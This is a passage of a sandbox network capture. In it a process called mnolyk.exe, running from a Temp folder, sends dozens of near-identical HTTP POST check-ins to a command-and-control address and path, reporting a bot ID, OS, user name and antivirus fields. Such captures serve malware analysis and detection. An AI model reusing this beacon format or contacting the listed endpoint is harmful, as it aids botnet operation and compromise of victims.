Feb 7, 2023 20:00:05.126188040 CET	885	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:05.192668915 CET	885	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
641	192.168.2.5	50354	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:05.364849091 CET	886	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:05.428816080 CET	886	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
642	192.168.2.5	50355	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:05.610275030 CET	887	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:05.673839092 CET	887	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
643	192.168.2.5	50356	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:05.846184015 CET	888	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:05.911701918 CET	888	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
644	192.168.2.5	50357	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:06.081115961 CET	889	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:06.145586014 CET	889	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
645	192.168.2.5	50358	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:06.314096928 CET	890	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:06.375655890 CET	890	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
646	192.168.2.5	50359	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:06.547653913 CET	891	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:06.611047983 CET	891	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
647	192.168.2.5	50360	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:06.784027100 CET	892	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:06.849456072 CET	892	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
648	192.168.2.5	50361	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:07.031776905 CET	893	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:07.095475912 CET	893	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
649	192.168.2.5	50362	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:07.266628981 CET	894	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:07.329888105 CET	894	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.5	49771	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:22.069473028 CET	256	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:22.134497881 CET	257	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
650	192.168.2.5	50363	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:07.542076111 CET	895	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:07.604684114 CET	895	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
651	192.168.2.5	50364	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:07.781570911 CET	896	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:07.844630003 CET	896	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
652	192.168.2.5	50365	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:08.016119003 CET	897	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:08.080651999 CET	897	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
653	192.168.2.5	50366	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:08.251400948 CET	898	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:08.315598965 CET	898	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
654	192.168.2.5	50367	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:08.484564066 CET	899	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:08.548141003 CET	899	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
655	192.168.2.5	50368	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:08.721533060 CET	900	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:08.786614895 CET	900	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
656	192.168.2.5	50369	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:08.954483986 CET	901	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:09.019556046 CET	901	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
657	192.168.2.5	50370	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:09.189136982 CET	902	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:09.255594969 CET	902	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
658	192.168.2.5	50371	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:09.426162004 CET	903	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:09.488029957 CET	903	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
659	192.168.2.5	50372	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:09.704797029 CET	904	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:09.771244049 CET	904	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.5	49772	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:22.305855036 CET	257	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:22.371057034 CET	258	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
